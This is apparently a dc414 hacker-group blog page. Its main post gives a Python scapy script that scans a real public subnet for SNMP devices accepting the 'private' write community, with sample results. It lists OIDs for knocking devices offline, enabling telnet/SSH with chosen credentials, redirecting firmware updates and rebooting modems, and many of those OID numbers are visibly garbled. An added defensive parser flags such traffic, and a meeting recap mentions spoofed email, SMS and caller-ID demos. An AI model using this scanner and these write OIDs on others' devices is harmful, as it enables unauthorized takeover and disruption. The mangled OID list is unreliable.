Most of the crew will be in Vegas for DEFCON20 this year!!! Let's all get drunk and party! I will also be getting married while there to the super awesome cmoney!! For our brothers not going, we will be doing our best to drink your share of booze 🙂 I get the opportunity to speak on the DCG panel again this year, so if you are at DC20 come check it out; other POCs and I will be laying down some knowledge for y'all. Also find me or other dc414 members so we can all party 😀 I will be taking lots of pictures and posting them on Twitter, Facebook, and G+, so be sure to check that shit out as well. See ya there.
At the last meeting dw5304 gave a demo on SNMP scanning and gaining access to things you shouldn't have access to with a few home-brew Windows apps he coded up. It's been a while since I messed with SNMP, but his demo got me back into it, so I made a little Python script to scan subnets for open SNMP servers with the read/write string set to private. Here is the code:
#! /usr/bin/env python
# Scan a /24 for SNMP agents that answer the read/write community "private"
# and record each responder's system description (sysDescr).
from scapy.all import IP, UDP, SNMP, SNMPget, SNMPvarbind, ASN1_OID, sr1, conf

conf.verb = 0                     # keep sr1() from printing per-packet noise
base = "69.2.1."                  # IP range to scan minus the last octet.
SYS_DESCR = "1.3.6.1.2.1.1.1.0"   # standard sysDescr.0 (the OID in this copy of the post is garbled)

with open('/tmp/snmp_output.txt', 'w+') as f:
    for i in range(1, 255):
        ip = base + str(i)
        p = IP(dst=ip) / UDP(dport=161, sport=39445) / SNMP(
            community="private",
            PDU=SNMPget(id=1416992799, varbindlist=[SNMPvarbind(oid=ASN1_OID(SYS_DESCR))]))
        pkt = sr1(p, timeout=1)
        # ICMP port-unreachable replies also come back through sr1(); keep only real SNMP answers.
        if pkt is None or not pkt.haslayer(SNMP):
            continue
        val = pkt[SNMP].PDU.varbindlist[0].value.val
        if isinstance(val, bytes):
            val = val.decode(errors="replace")
        line = pkt[IP].src + " - " + str(val)
        print(line)
        f.write(line + "\n")
It's a little hacked together and could use improvement, but it works (feel free to send in any improvements you make). It puts all the found servers' IPs in /tmp/snmp_output.txt along with their system description enumerated via SNMP. Here is a sample output:
184.108.40.206 - Ruckus Wireless Inc (C) 2006
220.127.116.11 - Ruckus Wireless Inc (C) 2006
18.104.22.168 - Ruckus Wireless Inc (C) 2006
22.214.171.124 - Ruckus Wireless Inc (C) 2006
126.96.36.199 - Ruckus Wireless Inc (C) 2006
188.8.131.52 - Ruckus Wireless Inc (C) 2006
184.108.40.206 - 24-port 10/100 + 2-Port Gigabit Switch with WebView and PoE
220.127.116.11 - Product: GW 4 FXS;SW Version: 5.80A.023.006
Once you find a few servers you can do snmpwalks on them and scour the output for juicy info.
Here are some good OIDs to look for and/or set (found most of this online and got some from dw5304):
ip.ipForwarding.0 <- this tells you if it's forwarding packets or not "useful to DoS a device"
18.104.22.168.22.214.171.124.2.1.1 <- ipforwardingdest
sysName.0 <- device name
126.96.36.199.4.1.44188.8.131.52.184.108.40.206.0 i 1 ... EnableTelnetServer.
220.127.116.11.4.1.4418.104.22.168.22.214.171.124.0 .... telnetIpStackInterfaces.
126.96.36.199.4.1.44188.8.131.52.184.108.40.206.0 .... telnetUserName.
220.127.116.11.4.1.4418.104.22.168.22.214.171.124.0 .... telnetPassword.
126.96.36.199.4.1.44188.8.131.52.184.108.40.206.0 .... telnetServerControl.
220.127.116.11.4.1.4418.104.22.168.22.214.171.124.0 .... telnetSessionIp.
126.96.36.199.4.1.44188.8.131.52.184.108.40.206.0 .... telnetSessionInProgress.
220.127.116.11.4.1.4418.104.22.168.22.214.171.124.0 .... telnetForceUserLogout.
126.96.36.199.188.8.131.52.0 = System Description
184.108.40.206.220.127.116.11.0 = Modem up time
18.104.22.168.2.1.4 = Some useful information (walk)
22.214.171.124.126.96.36.199.1.1.0 = HFC IP (getnext)
188.8.131.52.184.108.40.206.1.3.0 = HFC Subnet (getnext)
220.127.116.11.18.104.22.168.1.6.2 = Mac
22.214.171.124.126.96.36.199.188.8.131.52.3.1 = Maximum upload bandwidth
184.108.40.206.220.127.116.11.18.104.22.168.5.1 = Maximum download bandwidth
22.214.171.124.126.96.36.199.188.8.131.52 = Current status (walk)
184.108.40.206.220.127.116.11.18.104.22.168 = Hosts behind modem
22.214.171.124.126.96.36.199.4.4.0 = TFTP Configuration file server IP
188.8.131.52.184.108.40.206.4.5.0 = Configuration file name
220.127.116.11.18.104.22.168.3.5.0 = Current firmware
22.214.171.124.126.96.36.199.4.2.0 = DHCP Server IP
188.8.131.52.184.108.40.206.4.3.0 = Time Server IP
220.127.116.11.18.104.22.168.22.214.171.124 = View Log (walk)
126.96.36.199.188.8.131.52.184.108.40.206.2.3 = Downstream Frequency
220.127.116.11.18.104.22.168.4.5.0 = Image File
22.214.171.124.126.96.36.199.3.1.1 = Learned MAC (Get Next)
---[ Read / Write OIDs
188.8.131.52.184.108.40.206.1.3.0 = Boot modem (1=boot now)
220.127.116.11.18.104.22.168.3.1.0 = TFTP Firmware server IP
22.214.171.124.126.96.36.199.3.2.0 = Firmware filename
188.8.131.52.184.108.40.206.3.3.0 = Firmware update status (1=update now, 2=update on boot, 3=disable updates)
220.127.116.11.18.104.22.168.5.2.0 = SNMP Traps server IP (0.0.0.0 = disabled)
22.214.171.124.126.96.36.199.5.3.0 = SNMP Traps status (1=enabled, 4=disabled)
188.8.131.52.4.1.1184.108.40.206.1.14.0 = SNMP Port
220.127.116.11.4.1.118.104.22.168.1.15.0 = SNMP Traps port
22.214.171.124.4.1.1126.96.36.199.1.17.0 = HTML Server status (1=enabled, 2=disabled)
---[ Other OIDs
188.8.131.52.184.108.40.206.0 = modem type
220.127.116.11.18.104.22.168.4.0 = Cable Modem Serial Number
22.214.171.124.126.96.36.199.5.0 = Alternate OID for Config File
188.8.131.52.184.108.40.206.3.0 = Provisional Server
220.127.116.11.18.104.22.168.0 = Area String
22.214.171.124.126.96.36.199.1.3+(hfc ip) = Subnet Example
188.8.131.52.184.108.40.206.220.127.116.11.2418.104.22.168.22.214.171.124.126.96.36.199 = CPE USB MAC
188.8.131.52.184.108.40.206.1.6.1 = Cable Modem USB MAC
220.127.116.11.18.104.22.168.127.1.2.1.1.1.2 = Default Gateway MAC Address
22.214.171.124.126.96.36.199.127.1.1.3.1.6.1 = Max Burst Up
188.8.131.52.184.108.40.206.1.6.5 = CPE MAC
220.127.116.11.4.1.118.104.22.168.1.17.0 i 1 or 0 = enable or disable webif
22.214.171.124.4.1.44126.96.36.199.188.8.131.52 = "reflects the IP stack interfaces on which a ssh
184.108.40.206.4.1.44220.127.116.11.18.104.22.168 = "reflects the user name which will be allowed ssh access."
22.214.171.124.4.1.44126.96.36.199.188.8.131.52 = "reflects the password which will be allowed ssh access."
184.108.40.206.4.1.44220.127.116.11.18.104.22.168 = "start or stop the ssh server."
22.214.171.124.4.1.44126.96.36.199.188.8.131.52 = terminate ssh session
You can find a lot more online. Enjoy and happy hacking 🙂
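Editor's addition, not code from the dc414 post: the scapy script above sends an SNMPv1 GetRequest with community "private", and the read/write OIDs listed above are exactly what a SetRequest with that community string would touch. The block below is a stdlib-only BER codec for that message layout, with a check a defender can run over captured UDP/161 payloads to flag default community strings and write attempts. The sample packets are constructed inline; since the numeric OIDs in this copy of the post are garbled, the samples use the standard sysDescr.0 (1.3.6.1.2.1.1.1.0) and sysName.0 (1.3.6.1.2.1.1.5.0) OIDs. Function and constant names (build_request, parse_snmp, assess, DEFAULT_COMMUNITIES) are this example's own.

```python
"""Decode SNMPv1/v2c messages from raw UDP payloads and flag risky ones.

Added example (not from the dc414 post). Standard library only; the sample
packets are constructed inline, and the UDP/IP framing is assumed stripped.
"""

DEFAULT_COMMUNITIES = {"public", "private"}
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap", 0xA5: "GetBulkRequest"}

# ---- BER encoding (used only to build the constructed samples) -------------
def _tlv(tag, body):
    """Tag-length-value with short or long definite length."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body

def _int(n):
    """INTEGER in minimal two's-complement form."""
    return _tlv(0x02, n.to_bytes((n.bit_length() + 8) // 8, "big", signed=True))

def _oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, rest base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.insert(0, 0x80 | (a & 0x7F))
            a >>= 7
        out.extend(chunk)
    return _tlv(0x06, bytes(out))

def build_request(community, oid, pdu_tag=0xA0, request_id=1, value=None):
    """SNMPv1 request with one varbind; value=None gives the NULL used by GET."""
    val = _tlv(0x05, b"") if value is None else _tlv(0x04, value.encode())
    varbind = _tlv(0x30, _oid(oid) + val)
    pdu = _tlv(pdu_tag, _int(request_id) + _int(0) + _int(0) + _tlv(0x30, varbind))
    return _tlv(0x30, _int(0) + _tlv(0x04, community.encode()) + pdu)

# ---- BER decoding -----------------------------------------------------------
def _read_tlv(buf, pos):
    """Return (tag, value bytes, position after this TLV); rejects truncation."""
    tag, ln = buf[pos], buf[pos + 1]
    pos += 2
    if ln & 0x80:
        nbytes = ln & 0x7F
        ln = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + ln > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:pos + ln], pos + ln

def _decode_oid(body):
    arcs = [body[0] // 40, body[0] % 40]
    cur = 0
    for b in body[1:]:
        cur = (cur << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(cur)
            cur = 0
    return ".".join(map(str, arcs))

def parse_snmp(payload):
    """Version, community, PDU type and requested OIDs of a v1/v2c message."""
    tag, msg, _ = _read_tlv(payload, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, pos = _read_tlv(msg, 0)
    _, community, pos = _read_tlv(msg, pos)
    pdu_tag, pdu, _ = _read_tlv(msg, pos)
    _, _, pos = _read_tlv(pdu, 0)      # request-id
    _, _, pos = _read_tlv(pdu, pos)    # error-status
    _, _, pos = _read_tlv(pdu, pos)    # error-index
    _, vbl, _ = _read_tlv(pdu, pos)    # varbind list
    oids, p = [], 0
    while p < len(vbl):
        _, vb, p = _read_tlv(vbl, p)
        _, oid_body, _ = _read_tlv(vb, 0)
        oids.append(_decode_oid(oid_body))
    return {"version": int.from_bytes(ver, "big", signed=True),
            "community": community.decode(errors="replace"),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)), "oids": oids}

def assess(payload):
    """Findings a defender would alert on for one UDP/161 payload."""
    m = parse_snmp(payload)
    findings = []
    if m["community"] in DEFAULT_COMMUNITIES:
        findings.append("default community string %r" % m["community"])
    if m["pdu"] == "SetRequest":
        findings.append("write attempt (SetRequest) with v%d community auth" % (m["version"] + 1))
    return m, findings

# Constructed samples: the GET the scapy script sends, and a SET against sysName.0.
SAMPLE_GET = build_request("private", "1.3.6.1.2.1.1.1.0", request_id=1416992799)
SAMPLE_SET = build_request("private", "1.3.6.1.2.1.1.5.0", pdu_tag=0xA3,
                           request_id=2, value="renamed-host")

if __name__ == "__main__":
    for raw in (SAMPLE_GET, SAMPLE_SET):
        msg, findings = assess(raw)
        print(msg["pdu"], msg["community"], msg["oids"], findings)
```

Feed assess() the UDP payload of anything hitting port 161 on your own network and you get a quick view of who is still answering with "public"/"private" and who is issuing SetRequests under a plaintext community string; the fix on the device side is the same as what the post implies, change the community strings and restrict which source addresses the agent accepts.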
July's meeting was hot in more than one way! First I would like to thank genero again for his generous donation for the raffle, which put a solid $200 in the 3d printer fund!! Also congrats to faraday for winning both the raffle and the Photoshop and WIN contest!! I know it took forever to pick a winner but we did it damnit 😛
ngharo started the demos off by talking about how he set up dc414's new Asterisk server using Google Voice as the SIP trunk! Then he showed us how he set it up to use NMAP to scan IPs from Asterisk and speak the results to you over the phone! Klaiviel took over and made ngharo a case for his Raspberry Pi and a penny launcher with his sweet 3d printer. Then I stepped in and showed everyone how to send spoofed emails from the dc414 server using the email spoofer web app, then how to send spoofed txt messages using the same app 🙂 Then Tony used a SIP provider that allowed for spoofing CID to spoof a call to Vlad. Then dw5304 wowed us all with an SNMP scanner he made and showed us some of the results, like accessing routers, modems, and windmills!!
Here are some pics from the meeting thanx to cmoney and congrats to Castor for winning the dc414 free junk giveaway!
Here is Faraday with his raffle winnings!
Here is Castor and his free junk from dc414
Come party, video game style, at Bucketworks this Saturday, July 14th at 2PM.
BasementLAN only asks you bring $5 to donate to Bucketworks for electricity.
You can register at BasementLAN.org, or just show up 🙂